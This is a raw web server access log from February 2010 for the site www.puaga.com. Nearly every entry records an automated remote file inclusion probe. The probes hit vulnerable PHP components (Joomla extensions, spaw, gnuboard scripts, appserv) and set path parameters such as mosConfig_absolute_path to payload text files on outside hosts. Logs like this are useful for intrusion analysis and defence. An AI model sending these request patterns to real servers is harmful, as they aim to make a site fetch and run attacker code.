78.110.50.121 - - [21/Feb/2010:04:44:42 -0800] "GET /logs/access_100125.log%20%20///administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [21/Feb/2010:04:45:01 -0800] "GET /logs///administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [21/Feb/2010:04:45:01 -0800] "GET //administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [21/Feb/2010:04:45:01 -0800] "GET /logs/access_100125.log%20%20///administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.97.241.67 - - [21/Feb/2010:04:45:02 -0800] "GET /include/mail.inc.php?root=http://anka.interfree.it/interfree?? HTTP/1.1" 404 5258 "-" "Mozilla/3.0 (OS/2; U)" "www.puaga.com"
218.97.241.67 - - [21/Feb/2010:04:45:03 -0800] "GET /logs//include/mail.inc.php?root=http://anka.interfree.it/interfree?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.puaga.com"
78.110.50.121 - - [21/Feb/2010:04:45:10 -0800] "GET /logs/access_100205.log%20%20///administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [21/Feb/2010:04:45:29 -0800] "GET /modules/xt_conteudo//admin/spaw/spaw.controll.class.php?spaw_root=http://www.lumias-lighting.com//plugins/search/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [21/Feb/2010:04:45:29 -0800] "GET /logs//modules/xt_conteudo//admin/spaw/spaw.controll.class.php?spaw_root=http://www.lumias-lighting.com//plugins/search/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [21/Feb/2010:04:45:29 -0800] "GET /logs/access_100206.log%20%20//modules/xt_conteudo//admin/spaw/spaw.controll.class.php?spaw_root=http://www.lumias-lighting.com//plugins/search/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [21/Feb/2010:04:46:11 -0800] "GET /logs/access_100206.log%20%20//modules/xt_conteudo//admin/spaw/spaw.controll.class.php?spaw_root=http://www.lumias-lighting.com//plugins/search/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [21/Feb/2010:04:46:11 -0800] "GET /modules/xt_conteudo//admin/spaw/spaw.controll.class.php?spaw_root=http://www.lumias-lighting.com//plugins/search/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [21/Feb/2010:04:46:11 -0800] "GET /logs//modules/xt_conteudo//admin/spaw/spaw.controll.class.php?spaw_root=http://www.lumias-lighting.com//plugins/search/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [21/Feb/2010:04:47:01 -0800] "GET /logs/access.log//bbs//write_update.php?board_skin_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [21/Feb/2010:04:48:02 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [21/Feb/2010:04:48:02 -0800] "GET /logs/access_100123.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [21/Feb/2010:04:48:02 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
90.176.234.205 - - [21/Feb/2010:04:49:16 -0800] "GET /logs/access_100205.log%20%20//modules/xt_conteudo//admin/spaw/spaw.controll.class.php?spaw_root=http://www.lumias-lighting.com//plugins/search/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [21/Feb/2010:04:49:16 -0800] "GET /logs/access_100202.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
90.176.234.205 - - [21/Feb/2010:04:49:39 -0800] "GET /logs/access_100205.log%20%20//modules/xt_conteudo//admin/spaw/spaw.controll.class.php?spaw_root=http://www.lumias-lighting.com//plugins/search/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.181.7.101 - - [21/Feb/2010:04:49:43 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "www.puaga.com"
123.143.98.5 - - [21/Feb/2010:04:49:56 -0800] "GET /logs/access_100206.log//modules/xt_conteudo//admin/spaw/spaw.controll.class.php?spaw_root=http://goldq.homeip.net:8000//bbs///skin/dotoruskin/images/one.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [21/Feb/2010:04:49:56 -0800] "GET /modules/xt_conteudo//admin/spaw/spaw.controll.class.php?spaw_root=http://goldq.homeip.net:8000//bbs///skin/dotoruskin/images/one.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [21/Feb/2010:04:49:56 -0800] "GET /logs//modules/xt_conteudo//admin/spaw/spaw.controll.class.php?spaw_root=http://goldq.homeip.net:8000//bbs///skin/dotoruskin/images/one.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [21/Feb/2010:04:50:59 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [21/Feb/2010:04:50:59 -0800] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [21/Feb/2010:04:50:59 -0800] "GET /logs/access_100123.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
90.176.234.205 - - [21/Feb/2010:04:51:41 -0800] "GET /logs/access_100205.log%20%20//modules/xt_conteudo//admin/spaw/spaw.controll.class.php?spaw_root=http://www.lumias-lighting.com//plugins/search/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.22.65.80 - - [21/Feb/2010:04:51:50 -0800] "GET /logs/access_100212.log///?_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [21/Feb/2010:04:51:55 -0800] "GET /logs/access_100202.log%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.22.65.80 - - [21/Feb/2010:04:52:04 -0800] "GET /logs/access_100203.log///?_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.71.32.31 - - [21/Feb/2010:04:52:14 -0800] "GET /logs/access_100125.log//administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.71.32.31 - - [21/Feb/2010:04:52:14 -0800] "GET /administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.71.32.31 - - [21/Feb/2010:04:52:14 -0800] "GET /logs//administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.71.32.31 - - [21/Feb/2010:04:52:19 -0800] "GET /logs//administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.71.32.31 - - [21/Feb/2010:04:52:19 -0800] "GET /administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.71.32.31 - - [21/Feb/2010:04:52:19 -0800] "GET /logs/access_100125.log//administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.71.32.31 - - [21/Feb/2010:04:52:35 -0800] "GET /logs/access_100202.log//administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.71.32.31 - - [21/Feb/2010:04:52:38 -0800] "GET /logs/access_100202.log//administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
90.176.234.205 - - [21/Feb/2010:04:53:07 -0800] "GET /logs//modules/xt_conteudo//admin/spaw/spaw.controll.class.php?spaw_root=http://www.lumias-lighting.com//plugins/search/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
90.176.234.205 - - [21/Feb/2010:04:53:07 -0800] "GET /logs/access_100206.log%20%20//modules/xt_conteudo//admin/spaw/spaw.controll.class.php?spaw_root=http://www.lumias-lighting.com//plugins/search/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [21/Feb/2010:04:53:09 -0800] "GET /logs/access_100205.log%20%20//modules/xt_conteudo//admin/spaw/spaw.controll.class.php?spaw_root=http://www.lumias-lighting.com//plugins/search/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
90.176.234.205 - - [21/Feb/2010:04:53:51 -0800] "GET /modules/xt_conteudo//admin/spaw/spaw.controll.class.php?spaw_root=http://www.lumias-lighting.com//plugins/search/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [21/Feb/2010:04:54:02 -0800] "GET /logs/access_100205.log%20%20//modules/xt_conteudo//admin/spaw/spaw.controll.class.php?spaw_root=http://www.lumias-lighting.com//plugins/search/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [21/Feb/2010:04:54:04 -0800] "GET /logs/access_100123.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [21/Feb/2010:04:55:16 -0800] "GET /logs/access_100206.log%20%20//modules/xt_conteudo//admin/spaw/spaw.controll.class.php?spaw_root=http://goldq.homeip.net:8000//bbs///skin/dotoruskin/images/one.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [21/Feb/2010:04:55:34 -0800] "GET /logs//administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [21/Feb/2010:04:55:34 -0800] "GET /administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [21/Feb/2010:04:55:34 -0800] "GET /logs/access_100125.log//administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [21/Feb/2010:04:55:36 -0800] "GET /logs/access_100206.log%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [21/Feb/2010:04:55:36 -0800] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [21/Feb/2010:04:55:36 -0800] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [21/Feb/2010:04:55:39 -0800] "GET /logs/access_100125.log//administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [21/Feb/2010:04:55:39 -0800] "GET /administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [21/Feb/2010:04:55:39 -0800] "GET /logs//administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [21/Feb/2010:04:55:56 -0800] "GET /logs/access_100202.log//administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [21/Feb/2010:04:55:59 -0800] "GET /logs/access_100202.log//administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [21/Feb/2010:04:56:51 -0800] "GET /logs/access_100206.log%20%20//modules/xt_conteudo//admin/spaw/spaw.controll.class.php?spaw_root=http://www.lumias-lighting.com//plugins/search/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [21/Feb/2010:04:56:51 -0800] "GET /modules/xt_conteudo//admin/spaw/spaw.controll.class.php?spaw_root=http://www.lumias-lighting.com//plugins/search/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [21/Feb/2010:04:56:51 -0800] "GET /logs//modules/xt_conteudo//admin/spaw/spaw.controll.class.php?spaw_root=http://www.lumias-lighting.com//plugins/search/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [21/Feb/2010:04:57:00 -0800] "GET /modules/xt_conteudo//admin/spaw/spaw.controll.class.php?spaw_root=http://www.lumias-lighting.com//plugins/search/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [21/Feb/2010:04:57:00 -0800] "GET /logs//modules/xt_conteudo//admin/spaw/spaw.controll.class.php?spaw_root=http://www.lumias-lighting.com//plugins/search/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [21/Feb/2010:04:57:00 -0800] "GET /logs/access_100206.log%20%20//modules/xt_conteudo//admin/spaw/spaw.controll.class.php?spaw_root=http://www.lumias-lighting.com//plugins/search/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [21/Feb/2010:04:57:04 -0800] "GET /logs/access_100123.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/ID1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.199.140.158 - - [21/Feb/2010:04:57:05 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.fbcoronado.com/1??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [21/Feb/2010:04:57:05 -0800] "GET /logs/access_100118.log%20%20//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.modernart2day.se//administrator/cache/pira?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.199.140.158 - - [21/Feb/2010:04:57:05 -0800] "GET /logs/access_100117.log%20%20//bbs/write_update.php?board_skin_path=http://www.fbcoronado.com/1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.199.140.158 - - [21/Feb/2010:04:57:06 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.fbcoronado.com/1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [21/Feb/2010:04:57:46 -0800] "GET /administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [21/Feb/2010:04:57:46 -0800] "GET /logs//administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [21/Feb/2010:04:57:46 -0800] "GET /logs/access_100125.log//administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [21/Feb/2010:04:57:57 -0800] "GET /administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [21/Feb/2010:04:57:57 -0800] "GET /logs/access_100125.log//administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [21/Feb/2010:04:57:57 -0800] "GET /logs//administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [21/Feb/2010:04:58:05 -0800] "GET /logs/access_100202.log//administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.117.70.36 - - [21/Feb/2010:04:58:09 -0800] "GET /appserv/main.php?appserv_root=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.117.70.36 - - [21/Feb/2010:04:58:09 -0800] "GET /logs/access_100126.log//appserv/main.php?appserv_root=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.117.70.36 - - [21/Feb/2010:04:58:10 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [21/Feb/2010:04:58:14 -0800] "GET /logs/access_100202.log//administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.55.216.69 - - [21/Feb/2010:04:59:06 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "www.atesh.info"
65.55.216.69 - - [21/Feb/2010:04:59:07 -0800] "GET /atesh_info/nt.php?t=3637818527 HTTP/1.1" 200 61 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" "www.atesh.info"
64.71.32.31 - - [21/Feb/2010:04:59:25 -0800] "GET /administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.71.32.31 - - [21/Feb/2010:04:59:25 -0800] "GET /logs/access_100125.log//administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.71.32.31 - - [21/Feb/2010:04:59:25 -0800] "GET /logs//administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.71.32.31 - - [21/Feb/2010:04:59:26 -0800] "GET /logs/access_100202.log//administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.71.32.31 - - [21/Feb/2010:04:59:29 -0800] "GET /administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.71.32.31 - - [21/Feb/2010:04:59:29 -0800] "GET /logs/access_100125.log//administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.71.32.31 - - [21/Feb/2010:04:59:29 -0800] "GET /logs//administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.71.32.31 - - [21/Feb/2010:04:59:30 -0800] "GET /logs/access_100202.log//administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:05:00:42 -0800] "GET /logs/access_100119.log//index.php?DOCUMENT_ROOT=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:05:00:42 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:05:00:42 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:05:01:05 -0800] "GET /logs/access_100111.log//index.php?DOCUMENT_ROOT=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:05:01:05 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:05:01:05 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [21/Feb/2010:05:01:05 -0800] "GET /logs/access_100119.log//index.php?DOCUMENT_ROOT=http://www.cijoint.fr/cj201001/cijWotOxx7.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.98.5 - - [21/Feb/2010:05:01:31 -0800] "GET /logs/access_100118.log%20%20//modules/xt_conteudo//admin/spaw/spaw.controll.class.php?spaw_root=http://goldq.homeip.net:8000//bbs///skin/dotoruskin/images/one.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [21/Feb/2010:05:01:42 -0800] "GET /administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [21/Feb/2010:05:01:42 -0800] "GET /logs//administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [21/Feb/2010:05:01:42 -0800] "GET /logs/access_100125.log%20%20//administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.121 - - [21/Feb/2010:05:01:53 -0800] "GET /logs/access_100202.log%20%20//administrator/components/com_joomla-visites//myMailer.class.php?mosConfig_absolute_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.93.134.178 - - [21/Feb/2010:05:02:08 -0800] "GET /logs///bbs/delete_all.php?board_skin_path=http://www.import-et-export.fr//components/com_virtuemart/rs1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.93.134.178 - - [21/Feb/2010:05:02:09 -0800] "GET /logs/access_100206.log%20%20///bbs/delete_all.php?board_skin_path=http://www.import-et-export.fr//components/com_virtuemart/rs1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.93.134.178 - - [21/Feb/2010:05:02:15 -0800] "GET //bbs/delete_all.php?board_skin_path=http://www.import-et-export.fr//components/com_virtuemart/rs1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
